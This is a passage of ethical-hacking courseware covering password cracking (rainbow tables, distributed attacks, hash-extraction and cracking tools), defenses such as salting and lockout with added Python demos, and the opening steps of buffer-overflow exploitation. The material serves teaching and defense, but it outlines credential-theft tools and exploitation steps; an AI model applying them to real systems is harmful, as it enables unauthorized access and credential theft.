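        # Drop nonces whose tokens can no longer be valid, then check for a replay.
        self.seen = {n: e for n, e in self.seen.items() if e >= now}
        if nonce in self.seen:
            return False, "replayed"
        self.seen[nonce] = exp
        return True, user


if __name__ == "__main__":
    v = Verifier()
    tok = issue("alice", now=1000)
    print("first use:", v.check(tok, now=1001))
    print("replay:   ", v.check(tok, now=1002))
    print("tampered: ", v.check(forge_tag(tok), now=1001))
    print("expired:  ", v.check(issue("bob", now=1000), now=1040))
```

The expiry is what keeps the seen-nonce set small: once a token has expired it is rejected on that ground alone, so its nonce no longer needs to be remembered.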

Offline Attacks: Rainbow Table Attack

Offline Attacks: Distributed Network Attack
• A Distributed Network Attack (DNA) is a technique used for recovering passwords from hashes or password-protected files using the unused processing power of machines across the network
• The DNA Manager coordinates the attack and allocates small portions of the key search to machines that are distributed over the network
• The DNA Client runs in the background, consuming only unused processor time
• The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password

Offline Attacks
Offline attacks occur when the intruder checks the validity of passwords. He/she observes how the password is stored. If the usernames and passwords are stored in a readable file, it becomes easy for the attacker to gain access to the system. Hence, it is important to protect the list of passwords and keep it in an unreadable form, preferably encrypted.

Offline attacks, although time-consuming, are successful due to their small keyspace and short length. Notably, different password-cracking techniques are available on the Internet.
Two examples of offline attacks are as follows:
1. Rainbow table attack
2. Distributed Network Attack
• Rainbow Table Attack
A rainbow table attack uses the cryptanalytic time-memory trade-off technique, which requires less time than other techniques. It uses already-calculated information stored in memory to crack the encryption. In the rainbow table attack, the attacker creates a table of all the possible passwords and their respective hash values, known as a rainbow table, in advance.

Rainbow Table: A rainbow table is a precomputed table that contains word lists like dictionary files and brute-force lists and their hash values. It is a lookup table specially used in recovering a plaintext password from a ciphertext. The attacker uses this table to look for the password and tries to recover it from password hashes.
Computed Hashes: An attacker computes the hash for a list of possible passwords and compares it to the pre-computed hash table (rainbow table). If attackers find a match, they can crack the password.
Compare the Hashes: An attacker captures the hash of a password and compares it with the precomputed hash table. If a match is found, then the password is cracked. It is easy to recover passwords by comparing captured password hashes to the pre-computed tables.
Examples of pre-computed hashes:

Figure 6.20: Pre-computed hashes (table of sample plaintexts and their hash values)
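The table described above trades memory for time, and a true rainbow table stores far less than one row per password: it stores only the two ends of long hash-reduce chains and recomputes the middle on demand. The following is an added example (not part of the courseware, and not RainbowCrack's code) of that construction over a deliberately tiny space, 4-digit PINs hashed with MD5, so that the whole build runs in a second; the chain length, chain count, start points and reduction function are all constructed for the demo. It also shows the defender's side: the same table is useless against a hash computed over a salted input, because every salt value would need its own table.

```python
"""Toy rainbow table over 4-digit PINs (MD5) showing the time-memory trade-off and why
a salt defeats it. Added example, not part of the original courseware or of
RainbowCrack; all parameters are constructed for a 10,000-PIN space."""
import hashlib

SPACE = 10_000        # PINs 0000-9999
CHAIN_LEN = 20        # hashes per chain (the "time" side of the trade-off)
NUM_CHAINS = 200      # stored chain endpoints (the "memory" side)


def H(text):
    """The hash being attacked (MD5 here purely because the space is a toy)."""
    return hashlib.md5(text.encode()).hexdigest()


def R(i, digest):
    """i-th reduction function: map a digest back into the PIN space. Using a different
    function per position is what makes the table "rainbow" (it limits chain merges)."""
    return f"{(int(digest[:12], 16) + i) % SPACE:04d}"


def build_table():
    """Return ({endpoint: [start, ...]}, set of PINs the chains cover)."""
    table, covered = {}, set()
    for k in range(NUM_CHAINS):
        start = pin = f"{(k * 37) % SPACE:04d}"    # constructed start points
        for i in range(CHAIN_LEN):
            covered.add(pin)
            pin = R(i, H(pin))
        table.setdefault(pin, []).append(start)    # keep every chain ending here
    return table, covered


def lookup(table, digest):
    """Recover a PIN with H(pin) == digest, or None if no stored chain contains it."""
    for i in range(CHAIN_LEN - 1, -1, -1):
        # Hypothesis: the digest sat at position i of some chain. Walk to the end.
        pin = R(i, digest)
        for j in range(i + 1, CHAIN_LEN):
            pin = R(j, H(pin))
        for start in table.get(pin, []):
            cand = start                           # rebuild that chain up to position i
            for j in range(i):
                cand = R(j, H(cand))
            if H(cand) == digest:                  # guard against false alarms from merges
                return cand
    return None


TABLE, COVERED = build_table()

if __name__ == "__main__":
    print(f"stored endpoints: {len(TABLE)}, PINs recoverable: {len(COVERED)}")
    print("unsalted H('0037') ->", lookup(TABLE, H("0037")))
    print("salted   H('s4lt:0037') ->", lookup(TABLE, H("s4lt:0037")))
```

With CHAIN_LEN hashes per chain the table holds roughly CHAIN_LEN times fewer entries than the plaintexts it can recover, at the cost of up to about CHAIN_LEN squared hash computations per lookup. Against a salted hash the lookup returns None because the candidates it reconstructs are PINs, and no PIN hashes to the salted value; an attacker would need one table per salt, which is the point of the salting defense discussed later in this module.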

Tool to Create Rainbow Tables: rtgen
Source: http://project-rainbowcrack.com
RainbowCrack is a general-purpose implementation that takes advantage of the time-memory trade-off technique to crack hashes. This project allows you to crack a hashed password.
Attackers use the rtgen tool of this project to generate the rainbow tables. As shown in the screenshot, the rtgen program needs several parameters to generate a rainbow table. The syntax of the command line is:
Syntax: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

Figure 6.21:

Distributed Network Attack
A Distributed Network Attack (DNA) is a technique used for recovering password-protected files that utilizes the unused processing power of machines spread across the network to decrypt passwords. In this attack, the attacker installs a DNA manager in a central location where machines running DNA clients can access it over a network. The DNA manager coordinates the attack and assigns small portions of the key search to machines distributed throughout the network. The DNA client runs in the background, only taking the processor time that was unused. The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password. Attackers use the Password Recovery Toolkit (PRTK), which is equipped with DNA tools, to perform this attack.

The features of DNA are as follows:
• Easily reads statistics and graphs
• Adds user dictionaries to crack a password
• Optimizes password attacks for specific languages
• Modifies the user dictionaries
• Comprises stealth client installation functionality
• Automatically updates the client while updating the DNA server
DNA can be classified into two modules:
• DNA Server Interface
The DNA server interface allows users to manage DNA from a server. The DNA server module provides the user with the status of all the jobs that the DNA server is executing. The interface contains the following jobs:
  o Current Jobs: The current job queue consists of all the jobs added to the list by the controller. The current job list has many columns, such as the identification number assigned by the DNA to the job, the name of the encrypted file, the user's password, the password that matches a key that can unlock the data, the status of the job, and various other columns.
  o Finished Jobs: The finished job list provides information about the decryption jobs, including the password. It also has many columns that are similar to the current job list. These columns include the identification number assigned by DNA to the job, the name of the encrypted file, the decrypted path of the file, the key used to encrypt and decrypt the file, the date and time that the DNA server started working on the job, the date and time the DNA server finished working on the job, the elapsed time, etc.
• DNA Client Interface
Users can use the DNA client interface from many workstations. The interface helps the client statistics to coordinate easily and is available on machines with the pre-installed DNA client application. There are several components, such as the name of the DNA client, the name of the group to which the DNA client belongs, and the statistics about the current job.
• Network Management
The Network Traffic dialog box aids in the discovery of the network speed the DNA uses and the work-unit length of the DNA client. Using the work-unit length, a DNA client can work without contacting the DNA server. The DNA client application can contact the DNA server at the beginning and end of the work-unit length.
The user can monitor the job status queue and DNA. After collecting the data from the Network Traffic dialog box, the user can modify the client's work. When the size of the work-unit length increases, the speed of the network traffic decreases. A decrease in the speed of the traffic leads the client working on the jobs to spend longer amounts of time. Therefore, the user can make fewer requests to the server because of the reduction in the bandwidth of network traffic.

Password Recovery Tools
(slide: Elcomsoft Distributed Password Recovery; Password Recovery Toolkit)

Password Recovery Tools
Password recovery tools allow attackers to break complex passwords, recover strong encryption keys, and unlock several documents.
• Elcomsoft Distributed Password Recovery
Source: https://www.elcomsoft.com
The Elcomsoft Distributed Password Recovery application allows attackers to break complex passwords, recover strong encryption keys, and unlock documents in a production environment. Attackers can use this tool to recover the passwords of the target system to gain unauthorized access to the critical files and other system software.

Figure 6.22: Screenshot of Elcomsoft Distributed Password Recovery

Some of the password recovery tools are listed as follows:
• Password Recovery Toolkit (https://accessdata.com)
• Passware Kit Forensic (https://www.passware.com)
• hashcat (https://hashcat.net)
• Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)
• PCUnlocker (https://www.top-password.com)

Tools to Extract the Password Hashes
• pwdump7 extracts LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM) database
• Mimikatz (https://github.com)
• PowerShell Empire (https://github.com)
• DSInternals PowerShell (https://github.com)
• Ntdsxtract (https://github.com)

Tools to Extract the Password Hashes
The following tools can be used to extract the password hashes from the target system:
• pwdump7
Source: https://www.tarasco.org
pwdump7 is an application that dumps the password hashes (one-way functions or OWFs) from NT's SAM database. pwdump extracts LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM) database. This application or tool runs by extracting the binary SAM and SYSTEM files from the filesystem, and then extracts the hashes. One of the most powerful features of pwdump7 is that it is also capable of dumping protected files. pwdump7 can also extract passwords offline by selecting the target files. The use of this program requires administrative privileges on the remote system.

As shown in the screenshot, attackers use this tool to extract password hashes from the target system.

Figure 6.23: Screenshot of pwdump7

Some of the additional tools to extract password hashes are as follows:
• Mimikatz (https://github.com)
• PowerShell Empire (https://github.com)
• DSInternals PowerShell (https://github.com)
• Ntdsxtract (https://github.com)
Note: The use of the above tools requires administrative privileges on the remote system.

Password-Cracking Tools: L0phtCrack and ophcrack
• L0phtCrack is a password auditing and recovery application
• ophcrack is a Windows password cracker based on rainbow tables that comes with a graphical interface
• RainbowCrack cracks hashes with rainbow tables using the time-memory trade-off
• hashcat

Password-Cracking Tools
Password-cracking tools allow you to reset unknown or lost Windows local administrator, domain administrator, and other user account passwords. In the case of forgotten passwords, they even allow users instant access to their locked computer without reinstalling Windows. Attackers can use password-cracking tools to crack the passwords of the target system.

Some password-cracking tools are listed as follows.
• L0phtCrack
Source: https://www.l0phtcrack.com
L0phtCrack is a tool designed to audit passwords and recover applications. It recovers lost Microsoft Windows passwords with the help of dictionary, hybrid, rainbow table, and brute-force attacks, and it also checks the strength of the password.
As shown in the screenshot, attackers use L0phtCrack to crack the password of the target to gain access to the system.

Figure 6.24: Screenshot of L0phtCrack

• ophcrack
Source: http://ophcrack.sourceforge.net
ophcrack is a Windows password-cracking tool that uses rainbow tables for cracking passwords. It comes with a graphical user interface (GUI) and runs on different OSs such as Windows, Linux/UNIX, etc.
As shown in the screenshot, attackers use ophcrack to perform brute-force attacks and crack password hashes of the target system.

Figure 6.25: Screenshot of ophcrack

• RainbowCrack
Source: http://project-rainbowcrack.com
RainbowCrack cracks hashes with rainbow tables, using a time-memory trade-off algorithm. A traditional brute-force cracker cracks hashes in a manner that is different from that followed by a time-memory trade-off hash cracker. The brute-force hash cracker tries all possible plaintexts one after the other during cracking. In contrast, RainbowCrack pre-computes all the possible plaintext-hash pairs in the selected hash algorithm, charset, and plaintext length in advance and stores them in a "rainbow table" file. It may take a long time to pre-compute the tables, but once the pre-computation is finished, it is possible to easily and quickly crack the ciphertexts in the rainbow tables.
As shown in the screenshot, attackers use RainbowCrack to crack the password hashes of the target system.

Figure 6.26: Screenshot of RainbowCrack


Some password-cracking tools are listed as follows:
• John the Ripper (https://www.openwall.com)
• hashcat (https://hashcat.net)
• THC-Hydra (https://github.com)
• Medusa (http://foofus.net)

Password Salting
• Password salting is a technique where a random string of characters is added to the password before calculating the hashes
• Advantage: salting makes it more difficult to reverse the hashes and defeats pre-computed hash attacks
(slide example: Alice, Bob and Cecil all use the password "root"; their records carry different salts and therefore different hashes)

Password Salting
Password salting is a technique in which random strings of characters are added to a password before calculating the hashes. This makes it more difficult to reverse the hashes and helps in defeating pre-computed hash attacks. The longer the random string, the harder it becomes to break or crack the password. The random string of characters should be a combination of alphanumeric characters.
In cryptography, a "salt" consists of random data bits used as one input to a one-way function, the other being a password. Instead of passwords, the output of the one-way function can be stored and used to authenticate users. A salt combines with a password by a key derivation function to generate a key for use with a cipher or other cryptographic algorithm. This technique generates different hashes for the same password, which renders password cracking difficult.
Figure 6.27: Example of password salting (Alice, Bob and Cecil share the password "root" but get different hashes due to different salts)
Note: Windows password hashes are not salted.
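Figure 6.27 and the note above are the whole argument for salting: the same password stored three times yields three unrelated hashes, while an unsalted scheme such as the Windows hashes yields the same value every time, which is what makes a pre-computed table pay off. The following is an added example (not part of the courseware) of salted storage done the way the "key derivation function" sentence above describes, with PBKDF2-HMAC-SHA256, a per-user random salt and a constant-time comparison on verification. The record format and the iteration count are constructed for the demo; pick the iteration count for your own hardware and review it over time.

```python
"""Salted password storage with PBKDF2-HMAC-SHA256, reproducing the Figure 6.27 idea:
three users with the password "root" get three unrelated records. Added example, not
part of the original courseware; iteration count and record format are constructed."""
import hashlib
import hmac
import os

ITERATIONS = 200_000   # constructed for the demo; tune to roughly 100 ms on your servers
SALT_BYTES = 16        # 128-bit random salt per user


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record 'pbkdf2_sha256$iterations$salt_hex$hash_hex'."""
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, record):
    """Recompute the derivation with the stored salt and compare in constant time."""
    try:
        algo, iters, salt_hex, dk_hex = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(dk_hex)
        iters = int(iters)
    except ValueError:
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iters)
    return hmac.compare_digest(actual, expected)


def store_users(names, password):
    """Enrol several users with the same password; every record is different."""
    return {name: hash_password(password) for name in names}


if __name__ == "__main__":
    users = store_users(["Alice", "Bob", "Cecil"], "root")
    for name, record in users.items():
        print(f"{name}: {record}")
    print("Alice/root:", verify_password("root", users["Alice"]))
    print("Alice/Root:", verify_password("Root", users["Alice"]))
    # Unsalted (or identically salted) storage: the same password, the same record.
    print("same salt twice equal:",
          hash_password("root", salt=bytes(16)) == hash_password("root", salt=bytes(16)))
```

Storing the salt and iteration count inside the record is what lets the verification side recompute the derivation without any shared configuration, and lets you raise the iteration count for new records while old ones keep verifying.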

How to Defend against Password Cracking
• Use an information security audit to monitor and track password attacks
• Disallow the use of the same password during password change
• Disallow the use of passwords that can be found in a dictionary
• Do not use cleartext protocols and protocols with weak encryption
• Avoid storing passwords in an unsecured location
• Do not use any system default passwords

How to Defend against Password Cracking (Cont'd)
• Make passwords hard to guess by requiring 8-12 alphanumeric characters consisting of a combination of upper- and lower-case letters, numbers, and symbols
• Ensure that applications neither store passwords in memory nor write them to disk in clear text
• Use a random string as a prefix or suffix to the password before encryption
• Disallow the use of passwords such as date of birth, spouse, child, or pet's name
• Monitor the server's logs for brute-force attacks on the users' accounts

How to Defend against Password Cracking (Cont'd)
• Protect stored passwords on devices that are susceptible to physical theft
• Train employees to thwart social engineering such as shoulder surfing and dumpster diving, which reveal credentials
• Perform password screening when new passwords are created to avoid using commonly used passwords
• Use two-factor or multi-factor authentication, for example using CAPTCHA, to prevent automated attacks
• Secure and control physical access to systems to prevent offline password attacks
• Ensure that the password databases are encrypted and accessible only to system administrators
• Mask the display of passwords on the screen to avoid shoulder surfing attacks

How to Defend against Password Cracking

The best practices to protect against password cracking are listed as follows:

- Enable an information security audit to monitor and track password attacks.
- Do not use the same password during the password change.
- Do not share passwords.
- Do not use passwords that can be found in a dictionary.
- Do not use cleartext protocols or protocols with weak encryption.
- Set the password change policy to 30 days.
- Avoid storing passwords in an unsecured location.
- Do not use any system's default passwords.
- Make passwords hard to guess by using 8-12 alphanumeric characters, with a combination of upper- and lower-case letters, numbers, and symbols. This is because strong passwords are hard to guess. Therefore, the more complex the password, the less vulnerable it is to attacks.
- Ensure that applications neither store passwords in memory nor write them to disk in cleartext. Passwords are always vulnerable to theft if they are stored in memory. Once the password is known, it is extremely easy for attackers to escalate their rights in the application.
- Use a random string (salt) as a password prefix or suffix before performing encryption. This nullifies pre-computation and memorization. Because the salt is usually different for each individual, it is impractical for attackers to construct tables with a single encrypted version of each candidate password. UNIX systems typically use a 12-bit salt.
- Enable SYSKEY with a strong password to encrypt and protect the SAM database. Usually, the password information of user accounts is stored in the SAM database. It is very easy for password-cracking software to target the SAM database to access passwords. SYSKEY protects password information stored in the SAM database against password-cracking software through strong encryption techniques. It is more difficult to crack encrypted passwords than unencrypted ones.
- Never use personal information (e.g., birth date, or a spouse's, child's, or pet's name) to create passwords. Otherwise, it becomes quite easy for those close to you to crack your passwords.
- Monitor the server's logs for brute-force attacks on user accounts. Although brute-force attacks are difficult to stop, they are easily detectable if the web server log is monitored. For each unsuccessful login attempt, an HTTP 401 status code is recorded in the web server logs.
- Lock out those accounts that were subjected to too many incorrect password guesses. This provides protection against brute-force and guessing attacks.
- Many password sniffers can be successful if the LAN Manager and NTLM authentication are used. Disable LAN Manager and NTLM authentication protocols only after ensuring that it does not affect the network.
- Perform a periodic audit of passwords in the organization.
- Check any suspicious application that stores passwords in memory or writes them to disk.
- Unpatched systems can reset passwords during buffer overflow or denial-of-service attacks. Make sure to update the system.
- Examine whether the account is in use, deleted, or disabled. Disable the user account if multiple failed login attempts are detected.
- Enable account lockout with a certain number of attempts, counter time, and lockout duration.
- One of the most effective ways to manage passwords in organizations is to set an automated password reset.
- Make the system BIOS password protected, particularly on devices that are susceptible to physical threats, such as servers and laptops.
- Train employees to thwart social engineering tactics, such as shoulder surfing and dumpster diving, which are used to steal user credentials.
- Configure password policies under the Group Policy object in the Windows OS.
- Perform password screening when new passwords are created to avoid using commonly used passwords.
- Use two-factor or multi-factor authentication; for example, use CAPTCHA to prevent automated attacks on critical information systems.
- Secure and control physical access to systems to prevent offline password attacks.
- Ensure password database files are encrypted and accessible only by system administrators.
- Mask the display of passwords on screen to avoid shoulder-surfing attacks.
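The log-monitoring and account-lockout recommendations above can be combined into a small detector. The following Python example is added for this edit (it is not code from the courseware) and runs over constructed Apache-style access log lines: it counts HTTP 401 responses per account inside a counter window and locks the account for a configurable duration once the attempt threshold is reached; the user names, addresses and timestamps are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of "combined" access log lines (not real traffic).
# Format: client - user [timestamp] "request" status bytes
SAMPLE_LOG = """\
10.0.0.5 - alice [10/Oct/2020:13:55:01 +0000] "POST /login HTTP/1.1" 401 512
10.0.0.5 - alice [10/Oct/2020:13:55:03 +0000] "POST /login HTTP/1.1" 401 512
10.0.0.5 - alice [10/Oct/2020:13:55:04 +0000] "POST /login HTTP/1.1" 401 512
10.0.0.5 - alice [10/Oct/2020:13:55:06 +0000] "POST /login HTTP/1.1" 401 512
10.0.0.5 - alice [10/Oct/2020:13:55:07 +0000] "POST /login HTTP/1.1" 401 512
10.0.0.5 - alice [10/Oct/2020:13:55:09 +0000] "POST /login HTTP/1.1" 200 2048
10.0.0.9 - bob [10/Oct/2020:13:55:10 +0000] "POST /login HTTP/1.1" 401 512
10.0.0.9 - bob [10/Oct/2020:13:59:30 +0000] "POST /login HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \d+'
)


def parse_line(line):
    """Parse one access log line into a dict, or return None for unparsable input."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "user": m["user"], "ts": ts, "status": int(m["status"])}


class LockoutPolicy:
    """Account lockout: `threshold` failed logins (401) within `window_seconds`
    lock the account for `lockout_seconds` (the lockout duration)."""

    def __init__(self, threshold=5, window_seconds=60, lockout_seconds=900):
        self.threshold = threshold
        self.window = timedelta(seconds=window_seconds)
        self.duration = timedelta(seconds=lockout_seconds)
        self.failures = defaultdict(deque)  # user -> timestamps of recent 401s
        self.locked_until = {}              # user -> datetime when the lockout ends

    def is_locked(self, user, now):
        until = self.locked_until.get(user)
        return until is not None and now < until

    def record(self, event):
        """Feed one parsed event; returns 'ok', 'failed' or 'locked'.

        Any attempt made while the account is locked is reported as 'locked',
        even if the server answered 200, which is exactly the case the lockout
        should have prevented.
        """
        user, now = event["user"], event["ts"]
        if self.is_locked(user, now):
            return "locked"
        if event["status"] != 401:
            return "ok"
        recent = self.failures[user]
        recent.append(now)
        while recent and now - recent[0] > self.window:  # forget old failures
            recent.popleft()
        if len(recent) >= self.threshold:
            self.locked_until[user] = now + self.duration
            recent.clear()
            return "locked"
        return "failed"


def analyse(log_text, policy=None):
    """Run every parsable line through the policy; returns {user: [outcome, ...]}."""
    policy = policy or LockoutPolicy()
    outcome = defaultdict(list)
    for line in log_text.splitlines():
        event = parse_line(line)
        if event:
            outcome[event["user"]].append(policy.record(event))
    return dict(outcome)


if __name__ == "__main__":
    for user, results in analyse(SAMPLE_LOG).items():
        print(user, results)
```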
How to Defend against LLMNR/NBT-NS Poisoning

The easiest way to prevent a system from being attacked by a perpetrator is to disable both the LLMNR and NBT-NS services in the Windows OS. Attackers employ these services to obtain user credentials and gain unauthorized access to the user's system.

Steps to disable LLMNR/NBT-NS

Disabling LLMNR in any version of Windows

- Open the Local Group Policy Editor.
- Navigate to Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client.
- In the DNS Client, double-click Turn off multicast name resolution.
- Select the Enabled radio button and then click OK.

Figure 6.28: Disabling LLMNR in Windows

Disabling NBT-NS

- Open the Control Panel, navigate to Network and Internet -> Network and Sharing Center, and click on the Change adapter settings option on the right-hand side.
- Right-click on the network adapter and then click Properties, select TCP/IPv4, and then click Properties.
- Under the General tab, go to Advanced -> WINS.
- From the NetBIOS options, check the "Disable NetBIOS over TCP/IP" radio button and click OK.

Figure 6.29: Disabling NBT-NS in Windows
Tools to Detect LLMNR/NBT-NS Poisoning

Network administrators and cybersecurity professionals use tools such as Vindicate, got-responded, and Respounder to detect LLMNR/NBT-NS poisoning attacks.

- Vindicate

  Source: https://github.com

  Vindicate is an LLMNR/NBNS/mDNS spoofing detection toolkit for network administrators. Security professionals use this tool to detect name service spoofing. This tool helps them to quickly detect and isolate attackers on their network. It is designed to detect the use of hacking tools such as Responder, Inveigh, NBNSpoof, and Metasploit's LLMNR, NBNS, and mDNS spoofers while avoiding false positives. It exploits the Windows event log for quick integration with an Active Directory network.

Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
System Hacking

  Figure 6.30: Screenshot showing the output of Vindicate

- got-responded

  Source: https://github.com

  got-responded helps security professionals to check for LLMNR/NBT-NS spoofing. This tool starts in the default mode and checks for both LLMNR and NBT-NS spoofing but does not send fake SMB credentials.

  Figure 6.31: Screenshot showing the output of got-responded

- Respounder

  Source: https://github.com

  Respounder detects the presence of a responder in the network. Security professionals use this tool to identify compromised machines before hackers exploit password hashes. This tool also helps security professionals to detect rogue hosts running responder on public Wi-Fi networks, e.g., in airports and cafes, and avoid joining such networks.

  Figure 6.32: Screenshot showing the output of Respounder
Vulnerability Exploitation

Vulnerability exploitation involves the execution of multiple complex, interrelated steps to gain access to a remote system. Attackers can perform exploitation only after discovering vulnerabilities in the target system. Attackers use discovered vulnerabilities to develop exploits and deliver and execute the exploits on the remote system.

Steps involved in exploiting vulnerabilities:

1. Identify the Vulnerability

   Attackers identify the vulnerabilities that exist in the target system using various techniques discussed in the previous modules. These techniques include footprinting and reconnaissance, scanning, enumeration, and vulnerability analysis. After identifying the OSs used and vulnerable services running on the target system, attackers also use various online exploit sites such as Exploit Database (https://www.exploit-db.com) and SecurityFocus (https://www.securityfocus.com) to detect vulnerabilities in the underlying OS and applications.

2. Determine the Risk Associated with the Vulnerability

   After identifying a vulnerability, attackers determine the risk associated with the vulnerability, i.e., whether exploitation of this vulnerability sustains the security measures on the target system.

3. Determine the Capability of the Vulnerability

   If the risk is low, attackers can determine the capability of exploiting this vulnerability to gain remote access to the target system.

4. Develop the Exploit

   After determining the capability of the vulnerability, attackers use exploits from online exploit sites such as Exploit Database (https://www.exploit-db.com), or develop their own exploits using exploitation tools such as Metasploit.

5. Select the Method for Delivering: Local or Remote

   Attackers perform remote exploitation over a network to exploit a vulnerability existing in the remote system to gain shell access. If attackers have prior access to the system, they perform local exploitation to escalate privileges or execute applications in the target system.

6. Generate and Deliver the Payload

   Attackers, as part of exploitation, generate or select malicious payloads using tools such as Metasploit and deliver them to the remote system either using social engineering or through a network. Attackers inject malicious shellcode in the payloads, which, when executed, establishes a remote shell to the target system.

7. Gain Remote Access

   After generating the payload, attackers run the exploit to gain remote shell access to the target system. Now, attackers can run various malicious commands on the remote shell and control the system.
Exploit Sites

Attackers can use various exploit sites such as Exploit Database, SecurityFocus, etc. to discover vulnerabilities and download or develop exploits to perform remote exploitation on the target system. These sites include details of the latest vulnerabilities and exploits.

- Exploit Database

  Source: https://www.exploit-db.com

  Exploit Database includes details of the latest vulnerabilities present in various OSs, devices, applications, etc. Attackers can search Exploit Database to discover vulnerabilities in the target system, download the exploits from the database, and use exploitation tools such as Metasploit to gain remote access.

  Figure 6.33: Screenshot of Exploit Database

- SecurityFocus

  Source: https://www.securityfocus.com

  SecurityFocus contains a database of the recently reported cybersecurity incidents and software bugs, along with a searchable archive of common vulnerabilities and exposures (CVEs). Attackers can search SecurityFocus to detect vulnerabilities in the target OS and applications.

  Figure 6.34: Screenshot of SecurityFocus

- VulDB

  Source: https://vuldb.com

  VulDB includes details of the latest vulnerabilities and exploits, rated based on the highest exploitation probability. Attackers can search the VulDB to identify vulnerabilities and exploit them or even fully automate the exploitation.

  Figure 6.35: Screenshot of VulDB

- MITRE CVE

  Source: https://cve.mitre.org

  MITRE maintains a CVE database that contains details of the latest vulnerabilities. Attackers can search MITRE CVE to discover vulnerabilities that exist in the target system.

  Figure 6.36: Screenshot of MITRE CVE
Buffer Overflow

A buffer is an area of adjacent memory locations allocated to a program or application to handle its runtime data. Buffer overflow or overrun is a common vulnerability in applications or programs that accept more data than the allocated buffer. This vulnerability allows the application to exceed the buffer while writing data to the buffer and overwrite neighboring memory locations. Furthermore, this vulnerability leads to erratic system behavior, system crash, memory access errors, etc. Attackers exploit a buffer overflow vulnerability to inject malicious code into the buffer to damage files, modify program data, access critical information, escalate privileges, gain shell access, and so on.

Why Are Programs and Applications Vulnerable to Buffer Overflows?

- Boundary checks are not performed fully, or, in most cases, entirely skipped
- Applications that use older versions of programming languages involve several vulnerabilities
- Programs that use unsafe and vulnerable functions fail to validate the buffer size
- Programs and applications that do not adhere to good programming practices
- Programmers that fail to set proper filtering and validation principles in the applications
- Systems that execute code present in the stack segment are vulnerable to buffer overflows
- Improper memory allocation and insufficient input sanitization in the application lead to buffer overflow attacks
- Application programs that use pointers for accessing heap memory result in buffer overflows
Types of Buffer Overflow

There are two types of buffer overflow, namely the stack-based buffer overflow and the heap-based buffer overflow.

- Stack-Based Buffer Overflow

  In most applications, a stack is used for static memory allocation. Contiguous blocks of memory are allocated for a stack to store temporary variables created by a function. The stack stores the variables in "Last-in First-out" (LIFO) order. Whenever a function is called, the required memory for storing the variables is declared on the stack, and when the function returns, the memory is automatically deallocated. There are two stack operations, namely, PUSH, which stores data onto the stack, and POP, which removes data from the stack.

  Stack memory includes five types of registers:

  - EBP: Extended Base Pointer (EBP), also known as Stack Base, stores the address of the first data element stored onto the stack
  - ESP: Extended Stack Pointer (ESP) stores the address of the next data element to be stored onto the stack
  - EIP: Extended Instruction Pointer (EIP) stores the address of the next instruction to be executed
  - ESI: Extended Source Index (ESI) maintains the source index for various string operations
  - EDI: Extended Destination Index (EDI) maintains the destination index for various string operations

  A stack-based buffer overflow occurs when an application writes more data to a buffer than what is actually allocated for that buffer. To understand stack-based buffer overflow, you must focus on the EBP, EIP, and ESP registers. EIP is the most important read-only register, which stores the address of the instruction that needs to be subsequently executed.

  Figure 6.37: Representation of stack

  Whenever a function starts execution, a stack frame that stores its information is pushed onto the stack and stored in the ESP register. When the function returns, the stack frame is popped out from the stack and the execution resumes from the return address stored in the EIP register. Hence, if an application or program is vulnerable to a buffer overflow attack, then attackers take control of the EIP register to replace the return address of the function with malicious code that allows them to gain shell access to the target system.

  Figure 6.38: Demonstration of stack-based buffer overflow (normal stack when a function is called, and the stack when an attacker overflows the buffer in the function to smash the stack)

- Heap-Based Buffer Overflow

  A heap is used for dynamic memory allocation. Heap memory is dynamically allocated at run time during the execution of the program, and it stores the program data. Accessing heap memory is slower than accessing stack memory. The allocation and deallocation of heap memory is not performed automatically. Programmers must write code for the allocation [malloc()] of heap memory, and after the execution is complete, they must deallocate the memory using functions such as free().

  Heap-based overflow occurs when a block of memory is allocated to a heap and data is written without any bound checking. This vulnerability leads to overwriting links to dynamic memory allocation (dynamic object pointers), heap headers, heap-based data, virtual function tables, etc. Attackers exploit heap-based buffer overflow to take control of the program's execution.

  Buffer overflows commonly occur in the heap memory space, and exploitation of these bugs is different from that of stack-based buffer overflows. Heap overflows have been prominently discovered as software security bugs. Unlike stack overflows, heap overflows are inconsistent and have varying exploitation techniques.

  Figure 6.39: Demonstration of heap-based buffer overflow
Buffer Overflow in Simple C

The examples shown in the screenshots demonstrate stack-based and heap-based buffer overflow:

Figure 6.40: Screenshot of C program demonstrating stack-based buffer overflow

Figure 6.41: Screenshot showing the output of stack-based buffer overflow

Figure 6.42: Screenshot of C program demonstrating heap-based buffer overflow

Figure 6.43: Screenshot showing the output of heap-based buffer overflow
Windows Buffer Overflow Exploitation

Exploiting a Windows-based buffer overflow vulnerability involves the following steps:

- Perform spiking
- Perform fuzzing
- Identify the offset
- Overwrite the EIP register
- Identify bad characters
- Identify the right module
- Generate shellcode
- Gain root access

Before executing the following steps, you must install and run a vulnerable server on the victim's machine, then run Immunity Debugger, and finally attach the vulnerable server to the debugger.

Perform Spiking

Spiking allows attackers to send crafted TCP or UDP packets to the vulnerable server to make it crash. It helps attackers to identify buffer overflow vulnerabilities in the target application. The following steps are involved in spiking:

- Step 1: Establish a connection with the vulnerable server using Netcat

  As shown in the screenshot below, you can use the following Netcat command to establish a connection with the target vulnerable server and identify the services or functions provided by the server.

